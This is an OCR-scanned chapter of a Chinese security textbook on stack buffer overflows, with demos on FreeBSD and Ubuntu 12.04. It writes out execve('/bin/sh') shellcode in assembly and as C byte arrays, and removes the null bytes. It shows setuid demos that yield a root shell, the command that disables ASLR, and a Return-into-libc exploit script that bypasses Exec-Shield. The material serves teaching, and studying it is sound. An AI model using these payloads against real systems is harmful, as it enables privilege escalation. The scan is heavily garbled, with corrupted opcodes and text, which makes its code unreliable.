pop SOCK 
pop Sebp 


lea Oxfffffffic(tecx) , esp 
ret 


Starting program: /usr/home/guest/sample5 
1, 0x08048254 in main () 


Breakpoint 
(gdb) x/8x 


Oxbfbfec40: 
Oxbfbfecb50: 


(gdb) x/1s 


Oxbfbfec54: 


(gdb) x/2x 


Oxbfbfec5c: 


$esp 
Oxbfbfec54 
0x00000025 

Oxbfbfec54 
"/bin/sh" 

Oxbfbfec5c 
Oxbfbfec54 
0x00000000 


确认 execve 的 参数 


Oxbfbfec5c 0x00000000 0x00000001 
0x6e69622f  0x0068732f Oxbfbfec54 


sh = "/bin/sh" 


data 
data[0] = "/bin/sh" 
data[1] = NULL 














我 们 在 调用 execve 的 地 方 (0x08048254 ) 设置 断 点 ， 确 认 


的 内 存 状 态 。 
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下 此 时 
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esp = bfbfec40 








bfbfec54 | bfbfec5c | 00000000 | 00000001100000025|  /bin /sh\O 





bfbfec40 bfbfec44 bfbfec48 bfbfec4c bfbfecbO bfbfecb4 bfbfecb8 








bfbfec54 [00000000 





bfbfecbc bfbfec60 











execve 需要 三 个 参数 ， 分 别 如 下 。 


e 第 1 参数 : 0xbfbfec54 ( /bin/sh 的 地 址 ) 
。 第 2 参数 : 0xbfbfec5c ( /bin/sh 的 地 址 以 及 内 容 为 NULL. 的 数组 ) 
e 第 3 参数: 0x00000000 ( NULL ) 





现在 我 们 已 经 按照 sample5.c 所 设计 的 样子 将 数据 排列 好 了 。 
Oxbfbfec4c Fil Oxbfbfec50 的 值 与 execve 的 调用 无 关 ， 因 此 我 们 可 以 
将 它们 删 掉 ， 于 是 我 们 便 得 到 了 一 上段 最 低 限 度 的 内 存 配 置 ， 如 下 所 示 。 


























V 运行 结果 





esp = bfbfec40 


bfbfec4c | bfbfec54 oxo] in /sh\0 | bfbfec4c | 00000000 








bfbfec40 bfbfec44 bfbfec48 bfbfec4c bfbfecbO bfbfecb4 bfbfecb8 








3.1 


利 





























用 缓冲 区 溢出 来 执行 入 


FARE 
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接 下 来 ， 我 们 来 编写 一 段 汇编 语言 程序 ， 将 上 述 数据 写 入 栈 当前 
esp 以 后 的 位 置 ， 并 调用 execve。 
下 面 的 sample6.s 会 向 栈 中 写 人 调用 execve 所 需 的 数据 ， 然 后 执行 














int $0x80, 


Y sample6.s 














.globl main 

main: 
XOL $eax, $eax 
pushl $eax 
mov. sesp, $eax 
sub $0x0c, eax 
pushl %eax 
mov sesp, $ebx 
pushl $0x0068732f 
pushl $0x6e69622f 
mov sesp, $edx 
XOL $eax, %eax 
pushl $eax 
pushl $ebx 
pushl $edx 
pushl $eax 
movb $0x3b, %al 
int $0x80 








下 面 我 们 用 objdump Hi E rfi BS CRAB Lt 








v 运行 示例 


data[1] ( NULL ) 


data[0] ( /bin/sh 的 地 址 ) 


字符 串 ”/sh\0” 


字符 串 ”/bin” 


第 3 参数 
第 2 参数 
第 1 参数 


call 的 返回 地 址 ( 可 以 为 任意 值 ) 

















$ gcc -Wall sample6.s -o sample6 


$ objdump -d sample6|grep \<main\>\: -A 16 
080483c4 «main»: 


80483c4: 
80483c6: 
80483c7: 
80483c9: 
80483cc: 
80483cd: 
80483cf: 


HI 
50 
89 
83 
50 
89 
68 


co 


e0 
e8 0c 


e3 


xor 
push 
mov 
sub 
push 


mov 


Aue WS). (at) 100) push 


Seax, eax 
$eax 

sesp, seax 
$Oxc, eax 
$eax 

Sesp, sebx 
$0x68732f 


Uu lH 
rin Fio 
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80483d4: 68 2t 62 69 6e push $0x6e69622f 

80483d9: 89 e2 mov sesp, sedx 

80483db: ane xor Seax, seax 

80483dd: 50 push seax 

80483de: 53 push %ebx 

80483df: 52 push sedx 

8048360: 50 push seax 

80483e1: b0 3b mov $0x3b,%al 

80483e3: cd 80 int $0x80 

RIS FRA its A A — P Xx EP Las HG er INTO BIER AE AS BE ATE shellcode 

的 功能 。 我 们 可 以 利用 输出 的 机 器 语言 代码 编写 下 面 的 程序 。 





Y sample7.c 














unsigned char shellcode[] = { 
(ss bL 0X0, 
0x50, 
0x89, 0xe0, 
0x83, 0xe8, OxO0c, 
0x50, 
0x89, 0xe3, 
0x68, Ox2f, 0x73, 0x68, 0x00, 
0x68, 0x2f, 0x62, 0x69, 0x66; 
0x89, 0xe2, 
0x31, 0x60, 
0x50, 
0x53, 
0x52, 
0x50, 
0xb0, Ox3b, 
Oxcd, 0x80, 
he 
int main (void) 
{ 
void (*p) (void); 
p = (void(*) ()) shellcode; 
POR 
return 0; 





// 
Hid 
Wl 
Hd) 
iy) 
// 
// 
"7 
// 
// 
// 
// 
Id 
Wl 
// 
// 

















xor $eax, $eax 
push $eax 

mov $esp, eax 
sub $0x0c, %eax 
push $eax 

mov $esp, $ebx 
push $0x68732f 
push $0x6e69622f 
mov $esp, %edx 
xor $eax, $eax 
push $eax 

push $ebx 

push $edx 

push $eax 

mov $0x3b, %al 
int $0x80 




















| 
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v 运行 示例 


SESU 

Password: 

# gcc sample7.c -o sample7 
# chmod 4755 sample7 

# exit 

exit 

$ ./sample7 

# whoami 

root 


看 来 我 们 的 shelleode 成 功 了 。 
只 要 将 这 段 机 器 语言 代码 咎 入 日 标 程 序 并 设法 让 其 执行 ， 我 们 就 
够 夺取 系统 的 控制 权 了 。 











3.1.9 对 0x00 的 改进 


然而 ， 上 面 这 段 shellcode 其 实 还 无 法 用 来 对 sample3 进行 攻击 ， 
是 因为 里 面 出 现 了 0x00。 在 sample3 中 ,复制 数据 时 使 用 了 strcpy 












































ab 
He 


x 
PR 


数 ， 这 个 函数 会 用 0x00 来 判断 字符 串 的 结尾 。 因 此 当 shellcode PEH 





Jil 0x00 时 ，strcpy 就 无 法 完整 地 复制 shellcode 的 数据 了 。 
为 了 解决 这 个 问题 ， 我 们 需要 对 shellcode 进行 一 些 加 工 。 
sample6 中 ， 在 对 字符 串 /sh\0 进行 push 的 地 方 出 现 了 0x00。 








80483cf: 68 2f 73 68 00 push $0x68732£f 
8048324: 68 硬 2 62 69 6 push $0x6e69622f 





这 个 问题 有 很 多 种 解决 方法 ， 一 般 来 说 会 采用 下 面 的 方法 。 


e 将 /bin/sh 改 为 /bin//sh Už 8 个 字 节 
* 在 前 面 先 push $0 





尽管 多 了 一 个 斜 枉 ， 但 是 这 个 命令 在 运行 上 并 不 会 有 什么 问题 。 
此 ， 我 们 可 以 将 /sh\0 改 为 Vsh， 这 样 就 成 功 消 灭 了 push 里 面 的 0x00, 
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然后 , 我 们 可 以 用 xor 和 push 相 
作为 字符 串 结 尾 的 标志 ， 这 样 我 们 就 能 够 在 整 段 代码 中 避免 出 现 0x00 了 。 


V sample8.s 


.globl mai 

main: 
xor 
pushl 
mov. 
sub 





v 运行 示例 


n 


$eax, 
$eax 

Sesp, 
$0x10 
$eax 

Sesp, 
seax, 


$eax 


Sesp, 
$eax, 
$eax 
Sebx 
Sedx 
$eax 
$0x3b 
$0x80 





$eax 


$eax 


, %eax 


Sebx 


$eax 








[r 


结合 的 方法 “, 向 栈 中 放 和 人 一 个 0x00 





push 0x00000000 
$0x68732£2£ push 字 符 串 Wsh' 
$0x6e69622£ push 字 符 串 "/bin" 


Sedx 


$eax 


, Sal 


$ gcc -Wall sample8.s -o sample8 


$ objdump -d sample8|grep \<main\>\: -A 18 
08048404 «main»: 


8048404: 
8048406: 
8048407: 
8048409: 
804840c: 
804840d: 
804840f : 


Sm 
50 
89 
83 
Ext) 
89 
31 


co XOr 
push 
e0 mov 
e8 10 sub 
push 
e3 mov 
co XOr 





Seax, Seax 
$eax 

sesp, seax 
$0x10, eax 
$eax 

sesp, sebx 


Seax, seax 


(D 这 里 的 原理 是 ， 两 个 完全 一 样 的 值 进行 xor 运算 后 会 得 到 0x00， 这 样 就 可 以 避免 


在 代码 中 直接 写 0x00。 





译 者 注 
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8048411: 50 push $eax 
8048412: 68 2t 2f 73 68 push X $0x68732f2f 
8048417: 68 2f 62 69 6e push $0x6e69622f 


804841c: 89 e2 mov Sesp, sedx 
804841e: que exo Seax, Seax 
8048420: 50 push $eax 
8048421: 53 push Sebx 
8048422: 52 push Sedx 
8048423: 50 push ‘%eax 
8048424: b0 3b mov $0x3b, al 
8048426: cd 80 int $0x80 


Y sample9.c 


unsigned char shellcode[] - ( 

0x31, Oxc0O, // xor $eax, %eax 
0x50, // push %eax 

0x89, Oxe0, // mov %esp, %eax 
0x83, Oxe8, 0x10, // sub $0x10, %eax 
0x50, // push %eax 

0x89, 0xe3, // mov %esp, %ebx 
0x31, OxcO0, // xor $eax, %eax 
0x50, // push %eax 

0x68, Ox2f, Ox2f, 0x73, 0x68, // push $0x68732£2£ 
0x68, Ox2f, 0x62, 0x69, Ox6e, // push $0x6e69622£ 
0x89, Oxe2, // mov %esp, %edx 
0x31 0xc0; // xor $eax, *eax 
0x50, // push %eax 

0x53, // push %ebx 

0x52, // push %edx 

0x50, // push %eax 

OxbO, 0x3b, // mov $0x3b, $al 
Oxcd, 0x80, // int $0x80 

ba 


int main (void) 


void (*p) (void); 
p = (void(*) ())shellcode; 


pO; 
return 0; 
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$ gu 

Password: 

# gcc sample9.c -o sample9 
4 chmod 4755 sample9 

# exit 

exit 

$ ./sample9 

4 whoami 

root 











这 样 我 们 的 shelleode 就 完成 了 ， 可 以 在 exploit.py 中 使 用 它 了 。 
只 要 将 这 段 代 码 插 入 到 sample3 的 内 存 空间 中 ， 然 后 将 返回 地 址 改 
为 shellcode 的 起 始 地 址 ， 我 们 就 可 以 夺取 系统 权限 了 。 








ay 





v 运行 示例 


$ gdb sample3 

GNU gdb 6.1.1 [FreeBSD] 

(gdb) b *0x080485be 在 cpy 函 数 结尾 的 ret 指 令 处 设置 断 点 
Breakpoint 1 at 0x80485be 

(gdb) r "^python exploit.py bfbfebc8~" 

Starting program: /usr/home/guest/sample3 
"^python exploit.py bfbfebc8^" 

(no debugging symbols found)... 

(no debugging symbols found)... 


Oxbfbfebc8 
Breakpoint 1, 0x080485be in cpy () 
(gdb) x/8x $esp 显示 返回 目标 地 址 


OxbfbfecO0c: Oxbfbfebc8  Oxbfbfed00 Oxbfbfec30  Oxbfbfec48 
0xbfbfeclc: 0x080484b7 0x00000000 0x00000000 0xbfbfec48 
(gdb) x/24i 0xbfbfebc8 将 返回 目标 地 址 处 的 指令 进行 反 汇编 





Oxbfbfebc8: xor Seax, seax 
Oxbfbfebca: push $eax 
Oxbfbfebcb: mov sesp, seax 
Oxbfbfebcd: sub $0x10, eax 
Oxbfbfebd0: push $eax 
Oxbfbfebdl: mov sesp, sebx 
Oxbfbfebd3 : xor Seax, eax 
Oxbfbfebd5: push $eax 
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$0x68732f2f 
$0x6e69622f 
sesp, sedx 
Seax, eax 
$eax 

$ebx 

$edx 

$eax 
$0x3b,%al 
$0x80 





Oxbfbfebd6: push 
Oxbfbfebdb: push 
Oxbfbfebe0: mov 
Oxbfbfebe2: xor 
Oxbfbfebe4: push 
Oxbfbfebe5: push 
Oxbfbfebe6: push 
Oxbfbfebe7: push 
Oxbfbfebe8: mov 
Oxbfbfebea: int 
我 们 发 现 函 数 的 返 





回 目标 地 址 已 经 变 成 了 我 们 的 shellcode。 


话说 ，sample3.c 在 运行 时 会 显示 shellcode 的 地 址 ， 因 为 这 只 是 一 





个 方便 我 们 攻击 的 演示 程序 。 实 际 情况 下 ， 我 们 不 知道 shellcode 位 于 目 
标 进 程 的 哪个 地 址 ， 因 此 只 能 进行 推测 。 

不 过 ， 栈 的 大 致 位 置 是 可 以 推测 出 来 的 ， 因 此 我 们 可 以 尽量 在 内 存 
空间 中 填充 NOP (0x90) 指令 ， 然 后 将 shellcode 放 在 最 后 ， 这 样 就 可 
以 提高 shellcode 被 执行 的 概率 。 

另外 ， 由 于 这 次 我 们 用 的 是 strepy 函数 ， 因 此 只 要 去 掉 0x00 就 可 
以 了 ， 但 有 些 软件 中 会 对 字符 串 有 更 多 的 限制 ， 例 如 只 接受 英文 字母 。 








为 了 应 付 这 样 的 情况 ， 





Ej shellcode 进行 了 很 多 人 研究。 
































曾经 有 一 段 时 间 业 界 对 如 何 只 用 特定 字符 集 来 编 

















顺便 一 提 ， 近 年 来 由 于 操作 系统 都 默认 启用 了 一 些 安全 机 制 ， 因 此 
这 种 传统 的 缓冲 区 溢出 攻击 已 经 不 管用 了 。 


一 专栏 : printf 类 函数 的 字符 串 格式 化 bug 











另外 一 个 比较 有 
bugo 

下 面 的 代码 中 ， 
执行 任意 代码 。 























#include <stdio.h> 




















代表 性 的 漏洞 当 属 printf 类 函数 的 字符 串 格 式 化 























如 果 向 printf 的 参数 中 填 入 适当 的 数据 ， 就 可 以 



































TMH 








软件 的 漏 ; 





void main(int argc, char *argv[]) 


{ 


printf (argv [1]) ; 

















体 的 原理 





我 们 在 这 里 先 省 略 ， 简 单 来 说 ，printf 类 函数 中 ， 有 























一 个 特殊 的 格式 转换 符 %n， 它 可 以 向 参数 中 指针 所 指 的 位 置 写 入 





当前 已 输出 的 数据 长 度 。 利 用 %n， 我 们 就 可 以 向 任意 地 址 写 入 任 

















意 的 值 。 

和 缓冲 区 
| 
TBI: H 
















































































趣 的 话 大 家 可 以 在 网 上 查 查 看 。 


出 相 比 ， 这 个 漏洞 没有 那么 严重 ， 但 


攻 





击 方法 非 
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我 们 很 难 消灭 所 有 程序 中 的 漏洞 ， 不 过 像 缓冲 区 洪 出 这 种 比较 常见 

















的 漏洞 ， 是 否 能 通过 操作 系统 和 编译 带 的 安全 机 制 来 应 对 呢 ? 








正 是 出 于 上 述 考 虑 ， 人 们 开发 出 了 一 些 安全 机 制 。 目 前 大 多 数 操作 
系统 都 采用 了 这 些 机 制 ， 并 且 取 得 了 不 错 的 效果 。 下 面 我 们 就 通过 在 























Ubuntu 12.04 中 的 演示 来 看 一 看 这 些 安全 机 制 。 








首先 我 们 来 看 看 ASLR ( Address Space Layout Randomization ， 地 址 


空间 布局 随机 化 )。ASLR 是 一 种 对 栈 、 模 块 、 动 态 分 配 的 内 存 空 间 等 的 


地 址 (位置 ) 进行 随机 配置 的 机 制 。 





ASLR 属于 操作 系统 的 功能 ， 例 如 在 Ubuntu 12.04 中 ， 我 们 可 以 通 
过 /proc/sys/kernel/randomize va space 来 查看 和 修改 这 一 设置 。 切 换 到 


root 用 户 ， 运 行 以 下 命令 。 


# cat /proc/sys/kernel/randomize va space 

2 启用 : 默认 

# echo 0 > /proc/sys/kernel/randomize va space 
# cat /proc/sys/kernel/randomize va space 

0 禁用 





























或 者 2。 简单 来 说 ， 它 们 的 含义 如 下 所 示 。 


e 0: 禁用 
e 1: 除 堆 以 外 随机 化 
o 2: 全 部 随机 化 ( 默认 ) 


] cat 命令 查看 randomize va space 的 值 ， 输 出 的 结果 可 能 是 0、 
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我 们 可 以 通过 下 面 的 程序 来 确认 一 下 ASLR 的 效果 ( 源 代码 见 
chap03\Ubuntu_12.04_x86 )。 这 个 程序 很 简单 ， 它 会 显示 出 用 malloc 分 
配 的 内 存 空 间 地 址 以 及 栈 的 地 址 。 














V test00.c 


#include <stdio.h> 
#include <stdlib.h> 


unsigned long get_sp(void) 


{ 
__asm__("movl $esp, $eax"); 

} 

int main (void) 

{ 
printf ("malloc: %p\n", malloc(16)); 
printf (" stack: 0x%lx\n", get sp()); 
return 0; 

} 


在 启用 ASLR 的 状态 下 ， 反 复 运 行 这 个 程序 ， 我 们 会 发 现 每 次 显示 
的 地 址 都 不 同 。 





v 运行 示例 
$ gcc test00.c -o test00 
$ ./test00 








malloc: 0x886e008 ”第 1 次 : # 
stack: Oxbff775f8 栈 
$ ./test00 

malloc: 0x86£7008 ”第 2 次 : YE 
stack: Oxbfe34dc8 栈 
$ ./test00 

malloc: 0x940e008 ”第 3 次 : H 
Stack: Oxbffc45b8 栈 





如 果 地 址 布局 无 法 推测 出 来 ， 我 们 也 就 无 法 知道 shellcode 的 具体 地 
址 了 。 
同样 的 程序 ， 如 果 在 禁用 ASLR 的 状态 下 运行 ， 则 差异 一 目 了 然 。 
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V 运行 示例 
$ sudo su 
[sudo] password for guest: 











# echo 0 > /proc/sys/kernel/randomize va space 
# exit 

exit 

$ ./test00 

malloc: 0x804b008 ”第 1 次 : HÈ 
stack: Oxbffff768 t% 
$ ./test00 

malloc: 0x804b008 ”第 1 次 : XE 
stack: Oxbffff768 栈 
$ ./test00 

malloc: 0x804b008 ”第 1 次 : H 
stack: Oxbffff768 栈 








关闭 ASLR 后 ， 我 们 发 现 无 论 运 行 多 少 次 ， 显 示 出 的 地 址 都 是 完全 
相同 的 。 下 面 我 们 来 看 一 个 演示 程序 test01， 这 个 程序 具备 缓冲 区 游 出 
漏洞 ， 它 会 用 strcpy 复制 命令 行 参 数 中 输入 的 字符 串 。 























v 运行 示例 


$ ./testOl “python exploit.py "bffff720"^ aaaabbbbccccdddd 
Oxbffff710 相同 

Illegal instruction 

$ ./test01 ^python exploit.py "bffff710"^ aaaabbbbccccdddd 
0xbffff710 相同 

# whoami 

root 

# echo 2 > /proc/sys/kernel/randomize va space 

4 exit 

exit 
$ ./testOl "python exploit.py "bffff710"^ aaaabbbbccccdddd 
Oxb£91c5d0 不 同 

Segmentation fault 

$ ./testOl "python exploit.py "bf91c5d0"~ aaaabbbbccccdddd 
Oxbfbdeedo 不 同 

Segmentation fault 











当局 用 ASLR 时 ，test01 所 显示 的 地 址 每 次 都 不 同 ， 因 此 ， 我 们 无 
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法 将 正确 的 地 址 传递 给 exploitpy， 也 就 无 法 成 功 夺取 系统 权限 了 。 
这 就 是 ASLR 的 效果 。 

















3.2.2 除 存放 可 执行 代码 的 内 存 空间 以 外 ， 对 其 余 内 
存 空间 尽量 禁用 执行 权限 : Exec-Shield 


Exec-Shield 是 一 种 通过 “限制 内 存 空间 的 读 写 和 执行 权限 ”来 防御 
攻击 的 机 币 
举 个 例子 ， 通 党 情况 下 我 们 不 会 在 用 作 栈 的 内 存 空间 里 存放 可 执行 
的 机 器 语言 代码 ， 因 此 我 们 可 以 将 栈 空 po AR RPM RO 可 执行 。 
反 过 来 说 ， 在 代码 区 域 中 存放 的 机 器 语言 代码 ， 通 常情 况 下 也 不 需要 在 
运行 时 进行 改写 ， 因 此 我 们 可 以 将 这 部 分 内 存 的 权限 设置 为 不 可 写 入 。 

这 样 一 来 ， 即 便 我 们 将 shellcode 复制 到 栈 ， 如 果 这 些 代 码 无 法 执 
行 ， 那 么 就 会 产生 Segmentation fault， 导 致 程序 停止 运行 。 

要 在 系统 中 查看 某 个 程序 进程 内 存 空间 的 读 写 和 执行 权限 ， 在 程序 
运行 时 输出 /proc/<PID>/maps 就 可 以 了 。 





=, 
o 






































v 运行 示例 
# ps -aef | grep test02 
root 1035 786 0 08:36 pts/0 00:00:00 ./test02 
ue SNNT OE 937 0 08:36 pts/1 00:00:00 grep --color-auto test02 
# cat /proc/1035/maps | grep stack 
bfdcc000-bfded000 rw-p 00000000 00:00 0 [stack] 





test02 是 test01 加 上 Exec-Shield 之 后 的 版 本 ， 其 中 栈 空 间 为 
bfdcc000 一 bfded000， 我 们 可 以 看 到 它 的 权限 为 rw-p， 没 有 代表 执行 权 
BRAY x. 

我 们 来 尝试 一 下 Exec-Shield 的 效果 。 


v 运行 示例 


$ ./test02 ‘python exploit.py "bffff710"^ aaaabbbbccccdddd 
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Oxbffff710 


Segmentation fault 


尽管 输入 的 地 址 和 输出 的 地 址 一 致 ， 但 攻击 还 是 失败 了 。 
ASLR 的 思路 是 防止 攻击 者 猜 中 地 址 ， 而 Exec-Shield 则 是 在 地 址 一 
致 的 情况 下 ， 攻 击 者 也 无 法 执行 其 中 的 机 器 语言 代码 。 
顺便 一 提 ， 如 果 我 们 查看 一 下 test01 的 /proc/<PID>/maps Wik, wt 
会 发 现 其 栈 空间 也 带 有 执行 权限 。 这 就 是 test01 和 test02 的 区 别 所 在 。 
要 想 进 一 步 了 解 的 话 ， 大 家 可 以 对 比 一 下 test01.s 和 test02.s。 


























3.2.3 ”在 编译 时 插入 检测 栈 数据 完整 性 的 代码 : StackGuard 
StackGuard 是 一 种 在 编译 时 在 各 函数 入 口 和 出 口 插入 用 于 检测 栈 数 
据 完整 性 的 机 器 语言 代码 的 方法 ， 它 属于 编译 髓 的 安全 机 制 。 
我 们 来 看 下 面 的 例子 。 














— 


v 运行 示例 


$ ./test03 
Oxbfb8ea40 
*** stack smashing detected ***: ./test03 terminated 


python -c 'print "A"*100'^ 


cecccce Belges ze 
/lib/i386-linux-gnu/libc.so.6(  fortify fail«0x45) [0xb766d0e5] 
/1ib/i386-linux-gnu/libc.so.6(40x10409a) [0xb766d09a] 

./test03 [0x8048515] 


[0x41414141] 

pu -sMemonvmdp ==== = 

08048000-08049000 r-xp 00000000 08:01 1061 /home/guest /test03 
08049000-0804a000 r-xp 00000000 08:01 1061 /home/guest/test03 
0804a000-0804b000 rwxp 00001000 08:01 1061 /home/guest/test03 
08352000-08373000 rwxp 00000000 00:00 0 [heap] 

省 略 

bfb6f000-bfb90000 rwxp 00000000 00:00 0 [stack] 

Aborted 





在 启用 ASLR 3X Exec-Shield 时 ， 上 述 程序 会 产生 Segmentation 
fault， 但 StackGuard 则 是 让 test03 检测 自身 的 异常 ， 并 主动 停止 运行 。 
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test03 具有 栈 缓冲 区 溢出 的 漏洞 ， 当 栈 内 数据 发 生 游 出 时 ， 
StackGuard 代码 能 够 检测 到 这 一 情况 ， 并 显示 stack smashing detected 消 
昌 制 终止 程序 运行 。 

我 们 看 一 下 test03.s 的 代码 ， 就 能 够 找到 编译 需 添 加 的 StackGuard 
代码 。 





T 














uu 





AS S 





V test03.s 


main: 


pushl sebp 





mov sesp, sebp 

and $-16, %esp 

sub $64, %esp 

mov 12(%ebp), $eax 

mov $eax, 28(%esp) 

mov $9gs:20, %eax 每 次 运行 时 %gs:20 中 都 会 存 入 一 个 随机 数 

mov $eax, 60(%esp) 将 随机 值 添加 到 栈 的 最 后 

xor $eax, %eax 

cal get sp 

mov $.LCO, $edx 

mov $eax, 4(%esp) 

mov $edx, (%esp) 

cal printf 

cal getchar 

mov 28(%esp), %eax 

add $4, %eax 

mov ($eax), %eax 

mov $eax, 4(%esp) 

lea 44(Sesp), $eax 

mov $eax, (%esp) 

cal strcpy 

mov. $0, $eax 

mov 60(%esp), %edx 将 栈 的 最 后 一 个 值 

xor %gs:20, %edx 与 %gs:20 进 行 对 比 

je .L5 如 果 一 致 则 跳 转 到 .L5 

cal __stack_chk fail 否则 跳 转 到 强制 终止 代码 
Se: 

leave 


ret 
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%gs:20 在 每 次 程序 运行 时 都 会 存 人 一 个 随机 数 ， 将 这 个 随机 数 复制 
到 函数 所 使 用 的 栈 空间 的 最 后 。 由 于 60(%esp) 后 面 就 是 ebp Fil ret_addr, 
因此 这 样 的 配置 可 以 保护 关键 地 址 的 数据 不 被 算 改 。 

当 函 数 即 将 返回 之 前 ， 程 序 将 %gs:20 的 值 与 60(%esp) 进行 对 比 。 
如 果 由 于 某 些 原因 导致 溢出 ，ebp 和 ret addr 被 覆盖 ， 那 么 60(%esp) 的 
值 也 会 被 同时 歼 盖 。 当 检测 到 游 出 时 ， 程 序 将 跳 转 到 ^ stack chk fail, 
并 终止 运行 。 

简单 来 说 ，StackGuard 机 制 所 保护 的 是 ebp 和 ret_addr， 是 一 种 针 
对 典型 栈 缓冲 区 溢出 攻击 的 防御 手段 。 

Ubuntu 12.04 的 gcc 中 ， 在 编译 时 默认 会 加 上 StackGuard 代码 ， 要 
禁用 StackGuard 需要 加 上 -fno-stack-protector 选项 。 
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3.3 ” 绕 开 安全 机 制 的 技术 


3.3.1 使 用 libc 中 的 函数 来 进行 攻击 : Return-into-libc 

ASLR, Exec-Shield, StackGuard 等 安全 机 制 大 大 提高 了 系统 的 安 
全 性 ， 然 而 这 也 并 不 代表 所 有 的 安全 漏洞 都 已 经 被 彻底 清除 了 。 
安全 专家 们 开始 研究 如 何 才能 绕 过 这 些 安全 机 制 来 发 动 攻击 ， 其 中 
一 种 方法 就 是 Return-into-libc。 

Return-into-libc 是 一 种 破解 Exec-Shield 的 方法 ， 它 的 思路 是 “即便 
无 法 执行 任意 代码 Cshelleode )， 最 终 只 要 能 够 运行 任意 程序 ， 也 可 以 夺 
取 系 统 权限 ”。 

Return-into-libc 的 基本 原理 是 通过 调整 参数 和 栈 的 配置 ， 使 得 程序 
能 够 跳 转 到 libc.so 中 的 system PAAR exec 类 函数 ， 借 此 来 运行 /bin/ 
sh 等 程序 。 

我 们 可 以 用 1dd 命令 查看 程序 在 运行 时 所 加 载 的 库 。 






































v 运行 示例 
$ 1ldd /bin/sh 
linux-gate.so.1 =>  (0xb774e000) 


libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb759e000) 
/lib/ld-linux.so.2 (0xb774£000) 








几乎 所 有 的 程序 在 运行 时 都 会 加 载 libc.so， 或 者 是 在 编译 时 进行 静 
态 链接 。 因 此 ， 只 要 我 们 能 够 调用 libe 中 的 system 函数 和 exec 类 函数 ， 
就 能 够 夺取 系统 权限 。 

请 大 家 在 关闭 ASLR 的 状态 下 运行 下 面 的 命令 。 
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v 运行 示例 


$ gdb test02 

GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04 
(gdb) b main 

Breakpoint 1 at 0x8048461 

(gdb) r 

Starting program: /home/guest/test02 

Breakpoint 1, 0x08048461 in main () 

(gdb) p system 

$1 = («text variable, no debug info>} 0xb7e6c430 <system> 
(gdb) p exit 

$2 = («text variable, no debug info») 0xb7e5ffb0 «exit» 
(gdb) 


这 样 我 们 就 得 到 了 system 和 exit 的 地 址 。 

这 次 我 们 不 需要 将 返回 地 址 改 成 位 于 栈 中 的 shellcode 地 址 ， 而 是 改 
成 system 函数 的 入 口 地 址 ， 将 system 也 数 的 返回 目标 设 为 exit， 并 将 / 
bin/sh 的 地 址 作为 参数 传递 过 去 。 

请 大 家 按 下 面 的 代码 编写 攻击 脚本 。 

















V exploit2.py 


#! /usr/bin/python 


import sys 
from struct import * 


if len(sys.argv) != 2: 
addr = 0x41414141 
else: 
addr = int(sys.argv[1], 16) + 0x08 


fsystem = int ("b7e6c430", 16) 
fexit = (oestrone 


data = "\x90\x90\x90\x90\x90\x90\x90\x90" 
data += "\x90\x90\x90\x90\x90\x90\x90\x90" 
data += "\x90\x90\x90\x90\x90\x90\x90\x90" 
data += "\x90\x90\x90\x90\x90\x90\x90c x90" 
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data += pack('«L', fsystem) 
data += pack('<L', fexit) 
data += pack('<L', addr) 


data += "/bin/sh" 


sys.stdout.write (data) 


v 运行 示例 


$ ./test02 ^python exploit2.py bffff740^ 


Oxbffff740 
4 whoami 
root 

# exit 








在 这 个 例子 中 ,我 们 








J system P 


test02 已 经 开启 了 Exec-Shield #Li 


BUCE T shellcode。 
央 ， 但 我 们 还 是 绕 过 了 它 并 成 功 夺 














取 了 权限 ， 这 是 一 个 最 简单 的 Return-into-libe 的 例子 。 
不 过 ， 尽 管 这 样 做 能 够 绕 开 Exec-Shield， 但 如 果 开 启 了 ASLR 或 者 








StackGuard 的 话 ， 上 再 











i 的 攻击 依然 会 失败 。 


3.3.2 ”利用 未 随机 化 的 模块 内 部 的 汇编 代码 进行 攻击 : ROP 


Return-into-libc 是 一 种 用 库 函 数 
方法 。 然 而 ， 如 果 ASLR 将 加 载 的 模 
由 ;准确 的 模块 

因此 ， 有 人 提出 ， 




















得 到 


libe ) 来 代替 shellcode 发 动 攻击 的 
块 全 部 随机 化 的 话 ， 由 于 我 们 无 法 


也 址 〈 不 知道 system 和 exec 的 地 址 )， 攻 击 就 会 失败 。 
能 不 能 利用 未 随机 化 的 那些 模块 内 部 的 汇编 代 








码 ， 拼 接 出 我 们 
X. MPRA Retu 

这 种 技术 刚刚 被 提出 时 ， 由 于 手 
能 不 能 用 来 进行 实际 的 攻击 。 然 而 ， 
渐 流 行 起 来 ， 现 在 








已 经 





rn-Oriented-Programming ( É 


所 需要 的 程序 逻辑 呢 ? 在 这 种 思路 下 衍生 出 的 攻击 手 

















| 向 返回 编程 )， 简 称 ROP. 
法 太 过 特殊 ， 大 家 纷纷 怀疑 它 到 底 
从 2010 年 开始 ， 这 种 技术 开始 逐 




















成 为 系统 安全 的 必修 课 之 一 了 。 


关于 ROP 的 详细 内 容 ， 我 也 很 想 介 绍 给 大 家 ， 然 而 
新 的 技术 ， 在 这 本 人 门 书 中 不 便 深 入 ， 因 此 本 章 中 对 攻击 技术 的 介绍 暂 











且 到 此 为 止 。 第 5 3n] 
的 内 容 。 





一 专栏 





zx 


Zi 








3.3 
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这 是 一 种 比较 





我 们 会 再 次 提 到 ROP， 请 大 家 届时 回忆 一 下 本 章 


: 计算 机 安全 为 什么 会 变 成 猫 


Ea 
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个 比较 特殊 





AE 





我 们 一 定 能 
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够 找到 一 个 明确 而 
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新 的 攻击 方法 ， 那 么 我 方 也 必须 研究 
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点 来 看 ， 尽 管 安全 领域 所 使 用 的 是 计算 忆 
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本 章 中 我 们 将 介绍 调试 器 的 原理 以 及 在 安全 技术 中 常用 的 编程 
技巧 。 

尽管 本 章 内 容 与 逆向 工程 没有 直接 关联 ， 但 大 多 数 安全 方面 的 工具 
都 使 用 了 与 本 章 内 容 十 分 相似 的 技术 。 如 果 你 想 亲 手 编写 一 些 分 析 工 
具 ， 那 么 本 章 的 知识 一 定 会 对 你 有 所 帮助 。 
























































4.1 ”通过 自制 调试 器 来 更 














41 通过 自制 调试 器 来 理解 其 原理 





ERE 








原理 











4.1.1 亲手 做 一 个 简单 的 调试 器 ， 在 实践 中 学 习 




















本 知识 ， 以 便 今后 能 够 更 加 熟练 地 运用 调试 工具 。 





一 个 吗 ?” 


这 个 问题 不 错 。 举 个 例子 ， 我 们 有 计算 器 ， 但 小 学 还 是 要 学 习 





